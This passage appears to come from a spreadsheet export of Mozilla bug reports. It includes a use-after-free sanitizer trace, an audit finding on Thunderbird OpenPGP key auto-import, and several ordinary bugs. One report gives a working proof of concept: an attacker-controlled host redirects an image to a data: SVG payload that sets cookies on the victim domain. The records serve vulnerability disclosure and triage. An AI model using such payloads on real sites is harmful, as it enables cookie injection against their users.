    #29 0x7fb0252fc601 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:237:19
    #30 0x7fb025322d00 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:504:19
    #31 0x7fb0245f6c4b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:508:14
    #32 0x7fb0245de3ef in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:593:10
    #33 0x7fb0245de3ef in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3072
    #34 0x7fb0245c0368 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
    #35 0x7fb0245fb449 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:781:13
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:330:9 in ~nsCOMPtr_base
Shadow bytes around the buggy address:
  0x0c107fffb010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fffb020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fffb030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fffb040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fffb050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c107fffb060: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd[fd]
  0x0c107fffb070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fffb080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fffb090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fffb0a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fffb0b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6682==ABORTING</t>
        </is>
      </c>
      <c r="X3455" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3456">
      <c r="A3456" t="n">
        <v>1673240</v>
      </c>
      <c r="B3456" t="inlineStr">
        <is>
          <t>2020-10-25 05:25:08 -0700</t>
        </is>
      </c>
      <c r="C3456" t="inlineStr">
        <is>
          <t>RNP-01-014 WP1 Thunderbird: Key manipulation via uncertified Auto-Import (Medium)</t>
        </is>
      </c>
      <c r="D3456" t="inlineStr">
        <is>
          <t>2021-06-10 04:00:14 -0700</t>
        </is>
      </c>
      <c r="E3456" t="n">
        <v>1</v>
      </c>
      <c r="F3456" t="n">
        <v>1</v>
      </c>
      <c r="G3456" t="n">
        <v>3</v>
      </c>
      <c r="H3456" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3456" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J3456" t="inlineStr">
        <is>
          <t>Security: OpenPGP</t>
        </is>
      </c>
      <c r="K3456" t="inlineStr">
        <is>
          <t>78</t>
        </is>
      </c>
      <c r="L3456" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3456" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3456" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3456" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3456" t="inlineStr">
        <is>
          <t>[RNP][fixed-in-rnp][needs tb adjustments]</t>
        </is>
      </c>
      <c r="Q3456" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3456" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3456" t="inlineStr">
        <is>
          <t>88 Branch</t>
        </is>
      </c>
      <c r="T3456" t="n">
        <v>1</v>
      </c>
      <c r="U3456" t="n">
        <v>0</v>
      </c>
      <c r="V3456" t="n">
        <v>31</v>
      </c>
      <c r="W3456" t="inlineStr">
        <is>
          <t>It was found that Thunderbird allows importing primary keys and subkeys that are not bound to a valid cryptographically secure signature. Additionally, Thunderbird automatically imports detected, attached PGP primary keys with an already trusted fingerprint, as it has an extended expiry time. This introduces the risk of attackers obtaining a primary key with an extended or unset expiry time of a trusted person, while it has not yet been imported into the PGP key ring of the victim.
The attackers can abuse this by adding a malicious subkey, which has been used by Thunderbird for email encryption, signature verification and key certification. Although the subkey is flagged as invalid by RNP, it is silently accepted and imported by Thunderbird as soon as the user opens the attacker’s mail.
***Affected File:***
comm/mail/extensions/openpgp/content/ui/enigmailMessengerOverlay.js
***Affected Code:***
~~~~~~
commonProcessAttachedKey(keyData, isBinaryAutocrypt) {
  let errorMsgObj = {};
  let preview = EnigmailKey.getKeyListFromKeyBlock(
     keyData,
     [...]
  );
  [...]
  for (let newKey of preview) {
     let oldKey = EnigmailKeyRing.getKeyById(newKey.fpr);
     if (!oldKey) {
        [...]
        continue; 
      }
      [...]
      let newHasNewValidity =
          oldKey.expiryTime &lt; newKey.expiryTime || 
          (oldKey.keyTrust != "r" &amp;&amp; newKey.keyTrust == "r");
      if (!newHasNewValidity)
          continue;
      [...]
      !EnigmailKeyRing.importKeyDataSilent(
         window,
         keyData,
         isBinaryAutocrypt,
         "0x" + newKey.fpr
       )
  [...]
~~~~~~
It is advised that the validity of the PGP keys returned from the RNP library is respected by Thunderbird and actions ensue accordingly. Additionally, Cure53 recommends for trusted primary keys not getting automatically imported. Instead, the user should be informed and asked about importing the new key. It is crucial to alert the user about every new subkey and user-identity which is about to be newly trusted.</t>
        </is>
      </c>
      <c r="X3456" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3457">
      <c r="A3457" t="n">
        <v>858296</v>
      </c>
      <c r="B3457" t="inlineStr">
        <is>
          <t>2013-04-04 15:43:23 -0700</t>
        </is>
      </c>
      <c r="C3457" t="inlineStr">
        <is>
          <t>Add Total Gross Revenue to app detail statistics</t>
        </is>
      </c>
      <c r="D3457" t="inlineStr">
        <is>
          <t>2013-12-03 14:36:20 -0800</t>
        </is>
      </c>
      <c r="E3457" t="n">
        <v>1</v>
      </c>
      <c r="F3457" t="n">
        <v>1</v>
      </c>
      <c r="G3457" t="n">
        <v>6</v>
      </c>
      <c r="H3457" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3457" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J3457" t="inlineStr">
        <is>
          <t>Statistics</t>
        </is>
      </c>
      <c r="K3457" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L3457" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3457" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3457" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3457" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3457" t="inlineStr"/>
      <c r="Q3457" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3457" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3457" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3457" t="n">
        <v>1</v>
      </c>
      <c r="U3457" t="n">
        <v>0</v>
      </c>
      <c r="V3457" t="n">
        <v>3</v>
      </c>
      <c r="W3457" t="inlineStr">
        <is>
          <t>Please add a simple 1-line graph to the app-specific statistics pages (eg. https://marketplace.firefox.com/app/twitter/statistics/?last=30)  called "Total Gross Revenue".  We'll link to Bango for specific breakdowns, net profit, etc. but we can show what we have.
The only selector on this graph is date, like the current graphs.
This is developer only - should never be public.</t>
        </is>
      </c>
      <c r="X3457" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3458">
      <c r="A3458" t="n">
        <v>887299</v>
      </c>
      <c r="B3458" t="inlineStr">
        <is>
          <t>2013-06-26 08:40:13 -0700</t>
        </is>
      </c>
      <c r="C3458" t="inlineStr">
        <is>
          <t>[tracking] Update All Terms of Services for all launch countries</t>
        </is>
      </c>
      <c r="D3458" t="inlineStr">
        <is>
          <t>2013-07-09 10:34:10 -0700</t>
        </is>
      </c>
      <c r="E3458" t="n">
        <v>1</v>
      </c>
      <c r="F3458" t="n">
        <v>1</v>
      </c>
      <c r="G3458" t="n">
        <v>6</v>
      </c>
      <c r="H3458" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3458" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J3458" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3458" t="inlineStr">
        <is>
          <t>1.2</t>
        </is>
      </c>
      <c r="L3458" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3458" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3458" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3458" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3458" t="inlineStr"/>
      <c r="Q3458" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3458" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3458" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3458" t="n">
        <v>1</v>
      </c>
      <c r="U3458" t="n">
        <v>0</v>
      </c>
      <c r="V3458" t="n">
        <v>2</v>
      </c>
      <c r="W3458" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #887290 +++</t>
        </is>
      </c>
      <c r="X3458" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3459">
      <c r="A3459" t="n">
        <v>1142083</v>
      </c>
      <c r="B3459" t="inlineStr">
        <is>
          <t>2015-03-11 08:15:28 -0700</t>
        </is>
      </c>
      <c r="C3459" t="inlineStr">
        <is>
          <t>IDN Unicode domain redirect is broken in Firefox 36/37/38</t>
        </is>
      </c>
      <c r="D3459" t="inlineStr">
        <is>
          <t>2023-09-01 23:26:23 -0700</t>
        </is>
      </c>
      <c r="E3459" t="n">
        <v>1</v>
      </c>
      <c r="F3459" t="n">
        <v>1</v>
      </c>
      <c r="G3459" t="n">
        <v>3</v>
      </c>
      <c r="H3459" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3459" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3459" t="inlineStr">
        <is>
          <t>Networking: DNS</t>
        </is>
      </c>
      <c r="K3459" t="inlineStr">
        <is>
          <t>36 Branch</t>
        </is>
      </c>
      <c r="L3459" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3459" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N3459" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3459" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3459" t="inlineStr">
        <is>
          <t>[good first bug]</t>
        </is>
      </c>
      <c r="Q3459" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3459" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3459" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T3459" t="n">
        <v>1</v>
      </c>
      <c r="U3459" t="n">
        <v>2</v>
      </c>
      <c r="V3459" t="n">
        <v>32</v>
      </c>
      <c r="W3459" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Build ID: 20150311004633
Steps to reproduce:
1. Enter http://zymiausifotografai.lt
2. Believe that should be redirected to http://www.žymiausifotografai.lt/
Actual results:
You get 404 (problem loading page) 'Server not found' error:
Firefox can't find the server at www.%c5%beymiausifotografai.lt.
Expected results:
You should be redirected to http://www.žymiausifotografai.lt/
Appears url do not converts to IDN name:
http://www.xn--ymiausifotografai-wzd.lt 
https://iwantmyname.com/domain-tools/idns/idn-punycode-converter?utf8=http%3A%2F%2Fwww.%C5%BEymiausifotografai.lt+&amp;search=convert
It works well in Internet Explorer 11 and Google Chrome newest.</t>
        </is>
      </c>
      <c r="X3459" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3460">
      <c r="A3460" t="n">
        <v>1630913</v>
      </c>
      <c r="B3460" t="inlineStr">
        <is>
          <t>2020-04-17 03:36:28 -0700</t>
        </is>
      </c>
      <c r="C3460" t="inlineStr">
        <is>
          <t>Add Andra Esanu to fxperftest group from Github</t>
        </is>
      </c>
      <c r="D3460" t="inlineStr">
        <is>
          <t>2020-04-23 07:37:36 -0700</t>
        </is>
      </c>
      <c r="E3460" t="n">
        <v>1</v>
      </c>
      <c r="F3460" t="n">
        <v>1</v>
      </c>
      <c r="G3460" t="n">
        <v>5</v>
      </c>
      <c r="H3460" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3460" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J3460" t="inlineStr">
        <is>
          <t>Github: Administration</t>
        </is>
      </c>
      <c r="K3460" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3460" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3460" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3460" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3460" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3460" t="inlineStr"/>
      <c r="Q3460" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3460" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3460" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3460" t="n">
        <v>1</v>
      </c>
      <c r="U3460" t="n">
        <v>0</v>
      </c>
      <c r="V3460" t="n">
        <v>5</v>
      </c>
      <c r="W3460" t="inlineStr">
        <is>
          <t>I've read https://wiki.mozilla.org/GitHub#Team_Maintainers_.26_Project_Leads, and need help adding a contributor to the org:
Name: Andra Esanu
Mozilla Email: aesanu@mozilla.com (pending activation)
Github Profile link: https://github.com/esanuandra
Github Team(s) *REQUIRED*: [fxperftest](https://github.com/orgs/mozilla/teams/fxperftest)</t>
        </is>
      </c>
      <c r="X3460" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3461">
      <c r="A3461" t="n">
        <v>1317641</v>
      </c>
      <c r="B3461" t="inlineStr">
        <is>
          <t>2016-11-15 00:49:49 -0800</t>
        </is>
      </c>
      <c r="C3461" t="inlineStr">
        <is>
          <t>http redirect to data: inherits principal (SVG image cookie setting; object XSS)</t>
        </is>
      </c>
      <c r="D3461" t="inlineStr">
        <is>
          <t>2024-05-30 09:23:05 -0700</t>
        </is>
      </c>
      <c r="E3461" t="n">
        <v>1</v>
      </c>
      <c r="F3461" t="n">
        <v>1</v>
      </c>
      <c r="G3461" t="n">
        <v>3</v>
      </c>
      <c r="H3461" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3461" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3461" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K3461" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L3461" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3461" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3461" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3461" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3461" t="inlineStr">
        <is>
          <t>[adv-main50+] see comments 16 and 20 [necko-active]</t>
        </is>
      </c>
      <c r="Q3461" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3461" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3461" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T3461" t="n">
        <v>1</v>
      </c>
      <c r="U3461" t="n">
        <v>0</v>
      </c>
      <c r="V3461" t="n">
        <v>86</v>
      </c>
      <c r="W3461" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
Steps to reproduce:
Tested on: Windows 7 x 64 Bit - Firefox 49.0.2
Tested on: Windows 8.1 x 32 Bit - Firefox Nightly: 53.0a1
A domain eg(example.com) loads an image file from an attacker controlled webserver:
&lt;img src="//attacker.com/redirect_svg.php"&gt;
The attacker server response with a redirect with an data: uri, which specifies an svg image file: 
//redirect_svg.php
HTTP 302 Found
Location: data:image/svg+xml,%3Csvg%20xmlns%3D%27http%3A//www.w3.org/2000/svg%27%3E%3Ccircle%20r%3D%27100%27%3E
%3C/circle%3E%3CforeignObject%3E%3Chtml%20xmlns%3D%27http%3A//www.w3.org/1999/xhtml%27%3E%3Cmeta%20http-equiv
%3D%27Set-Cookie%27%20content%3D%27ppp%3Dqqq%27%20/%3E%3C/html%3E%3C/foreignObject%3E%3C/svg%3E
Decoded Payload:
data:image/svg+xml,&lt;svg xmlns='http://www.w3.org/2000/svg'&gt;&lt;circle r='100'&gt;&lt;/circle&gt;&lt;foreignObject&gt;&lt;html xmlns='http://www.w3.org/1999/xhtml'&gt;&lt;meta http-equiv='Set-Cookie' content='ppp=qqq' /&gt;&lt;/html&gt;&lt;/foreignObject&gt;&lt;/svg&gt;
The SVG file is interpreted and displayed on example.com and a cookie ppp=qqq is set for example.com
//Poc:
# set DNS Host entry for attacker.com: 84.112.240.90
View: http://84.112.240.90/view_svg.html
Actual results:
Firefox detects and interprets the Set-Cookie value specified in the meta tag. 
This cookie is then stored for the domain example.com.
This makes it possible to set arbitrary cookies for any domain, which supports external images from users, which are viewed via the img tag. 
As developers do not expect images to be able to set cookies for their own domain, this behavior can introduce security vulnerabilities.
Expected results:
Firefox should not interpret Set-Cookie values in SVG meta tags, as this is the behavior in other browsers.</t>
        </is>
      </c>
      <c r="X3461" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3462">
      <c r="A3462" t="n">
        <v>1724896</v>
      </c>
      <c r="B3462" t="inlineStr">
        <is>
          <t>2021-08-10 03:45:25 -0700</t>
        </is>
      </c>
      <c r="C3462" t="inlineStr">
        <is>
          <t>Firefox incorrectly interprets newlines in HTTP headers in HTTP/3, allowing for header splitting</t>
        </is>
      </c>
      <c r="D3462" t="inlineStr">
        <is>
          <t>2022-08-27 01:04:13 -0700</t>
        </is>
      </c>
      <c r="E3462" t="n">
        <v>1</v>
      </c>
      <c r="F3462" t="n">
        <v>1</v>
      </c>
      <c r="G3462" t="n">
        <v>3</v>
      </c>
      <c r="H3462" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3462" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3462" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K3462" t="inlineStr">
        <is>
          <t>Firefox 90</t>
        </is>
      </c>
      <c r="L3462" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3462" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3462" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3462" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3462" t="inlineStr">
        <is>
          <t>[necko-triaged][sec-survey]</t>
        </is>
      </c>
      <c r="Q3462" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3462" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3462" t="inlineStr">
        <is>
          <t>93 Branch</t>
        </is>
      </c>
      <c r="T3462" t="n">
        <v>1</v>
      </c>
      <c r="U3462" t="n">
        <v>0</v>
      </c>
      <c r="V3462" t="n">
        <v>22</v>
      </c>
      <c r="W3462" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Steps to reproduce:
1. Set up a system at https://fb.mvfst.net/15 which speaks HTTP/3, and returns an HTTP/3 header with a newline in it.
2. Browse to it in Firefox with the Network tab open
Actual results:
The page loads properly and the Network tab indicates that Firefox parsed the header with a newline as two separate headers, similar to how it would have been parsed in HTTP/1.1
Expected results:
The page should fail to load, because the QPACK encoding for headers should allow Firefox to recognize that a single header containing a newline is present, and newlines are not allowed in headers.</t>
        </is>
      </c>
      <c r="X3462" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3463">
      <c r="A3463" t="n">
        <v>1451179</v>
      </c>
      <c r="B3463" t="inlineStr">
        <is>
          <t>2018-04-03 17:29:17 -0700</t>
        </is>
      </c>
      <c r="C3463" t="inlineStr">
        <is>
          <t>build failure on Linux: RuntimeError: File "../../../../browser/extensions/formautofill/content/autofillEditForms.js" not found</t>
        </is>
      </c>
      <c r="D3463" t="inlineStr">
        <is>
          <t>2018-04-30 18:28:33 -0700</t>
        </is>
      </c>
      <c r="E3463" t="n">
        <v>1</v>
      </c>
      <c r="F3463" t="n">
        <v>1</v>
      </c>
      <c r="G3463" t="n">
        <v>2</v>
      </c>
      <c r="H3463" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3463" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3463" t="inlineStr">
        <is>
          <t>WebPayments UI</t>
        </is>
      </c>
      <c r="K3463" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3463" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3463" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3463" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3463" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3463" t="inlineStr">
        <is>
          <t>[webpayments]</t>
        </is>
      </c>
      <c r="Q3463" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3463" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3463" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T3463" t="n">
        <v>1</v>
      </c>
      <c r="U3463" t="n">
        <v>0</v>
      </c>
      <c r="V3463" t="n">
        <v>9</v>
      </c>
      <c r="W3463" t="inlineStr">
        <is>
          <t>6:58.29 Traceback (most recent call last):
 6:58.29   File "/usr/lib/python2.7/runpy.py", line 174, in _run_module_as_main
 6:58.29     "__main__", fname, loader, pkg_name)
 6:58.29   File "/usr/lib/python2.7/runpy.py", line 72, in _run_code
 6:58.29     exec code in run_globals
 6:58.29   File "/md1/src/opt2/python/mozbuild/mozbuild/action/jar_maker.py", line 17, in &lt;module&gt;
 6:58.29     sys.exit(main(sys.argv[1:]))
 6:58.29   File "/md1/src/opt2/python/mozbuild/mozbuild/action/jar_maker.py", line 13, in main
 6:58.29     return mozbuild.jar.main(args)
 6:58.29   File "/md1/src/opt2/python/mozbuild/mozbuild/jar.py", line 608, in main
 6:58.29     jm.makeJar(infile, options.d)
 6:58.30   File "/md1/src/opt2/python/mozbuild/mozbuild/jar.py", line 333, in makeJar
 6:58.30     self.processJarSection(info, jardir)
 6:58.30   File "/md1/src/opt2/python/mozbuild/mozbuild/jar.py", line 388, in processJarSection
 6:58.30     self._processEntryLine(e, outHelper, jf)
 6:58.30   File "/md1/src/opt2/python/mozbuild/mozbuild/jar.py", line 460, in _processEntryLine
 6:58.30     ', '.join(src_base)))
 6:58.30 RuntimeError: File "../../../../browser/extensions/formautofill/content/autofillEditForms.js" not found in /md1/src/opt2/toolkit/components/payments, /md1/objdir/md1/src/opt2/toolkit/components/payments
 6:58.30 /md1/src/opt2/config/rules.mk:1235: recipe for target 'libs' failed
 6:58.30 make[4]: *** [libs] Error 1
 6:58.30 /md1/src/opt2/config/recurse.mk:100: recipe for target 'toolkit/components/payments/libs' failed
 6:58.30 make[3]: *** [toolkit/components/payments/libs] Error 2
 6:58.30 /md1/src/opt2/config/recurse.mk:32: recipe for target 'libs' failed
 6:58.30 make[2]: *** [libs] Error 2
 6:58.30 /md1/src/opt2/config/rules.mk:418: recipe for target 'default' failed
 6:58.30 make[1]: *** [default] Error 2
 6:58.30 client.mk:168: recipe for target 'build' failed
 6:58.30 make: *** [build] Error 2
 6:58.31 39 compiler warnings present.
 6:58.34 ccache (direct) hit rate: 25.4%; (preprocessed) hit rate: 1.5%; miss rate: 73.1%
 6:58.34 Notification center failed: Install notify-send (usually part of the libnotify package) to get a notification when the build finishes.</t>
        </is>
      </c>
      <c r="X3463" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3464">
      <c r="A3464" t="n">
        <v>1231121</v>
      </c>
      <c r="B3464" t="inlineStr">
        <is>
          <t>2015-12-08 06:50:59 -0800</t>
        </is>
      </c>
      <c r="C3464" t="inlineStr">
        <is>
          <t>Crash in skia::ConvolveHorizontally_SSE2 skia::ConvolveHorizontally mozilla::image::Downscaler::CommitRow mozilla::image::nsGIFDecoder2::OutputRow mozilla::image::nsGIFDecoder2::DoLzw</t>
        </is>
      </c>
      <c r="D3464" t="inlineStr">
        <is>
          <t>2016-09-22 14:41:38 -0700</t>
        </is>
      </c>
      <c r="E3464" t="n">
        <v>1</v>
      </c>
      <c r="F3464" t="n">
        <v>1</v>
      </c>
      <c r="G3464" t="n">
        <v>3</v>
      </c>
      <c r="H3464" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3464" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3464" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K3464" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3464" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3464" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3464" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3464" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3464" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main44+]</t>
        </is>
      </c>
      <c r="Q3464" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3464" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3464" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3464" t="n">
        <v>1</v>
      </c>
      <c r="U3464" t="n">
        <v>0</v>
      </c>
      <c r="V3464" t="n">
        <v>14</v>
      </c>
      <c r="W3464" t="inlineStr">
        <is>
          <t>Created attachment 8696676
bughunter crash stack
found another crash via bughunter reported up from mozilla-central to beta. Was able to reproduce this on a trunk m-c debug build  on windows 7 based on trunk
no idea if this is one of the known bugs so filing 
Steps to reproduce:
Load http://www.hamienet.com/catl6950.html
skia::ConvolveHorizontally_SSE2 skia::ConvolveHorizontally mozilla::image::Downscaler::CommitRow mozilla::image::nsGIFDecoder2::OutputRow mozilla::image::nsGIFDecoder2::DoLzw
one report was marked as exploitable-&gt; high</t>
        </is>
      </c>
      <c r="X3464" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3465">
      <c r="A3465" t="n">
        <v>1122770</v>
      </c>
      <c r="B3465" t="inlineStr">
        <is>
          <t>2015-01-16 14:44:57 -0800</t>
        </is>
      </c>
      <c r="C3465" t="inlineStr">
        <is>
          <t>500 timeout when posting resultsets to stage due to timeouts publishing to pulse</t>
        </is>
      </c>
      <c r="D3465" t="inlineStr">
        <is>
          <t>2015-02-25 10:38:12 -0800</t>
        </is>
      </c>
      <c r="E3465" t="n">
        <v>1</v>
      </c>
      <c r="F3465" t="n">
        <v>1</v>
      </c>
      <c r="G3465" t="n">
        <v>7</v>
      </c>
      <c r="H3465" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3465" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3465" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K3465" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3465" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3465" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3465" t="inlineStr">
        <is>
          <t>RESOLVED</t>
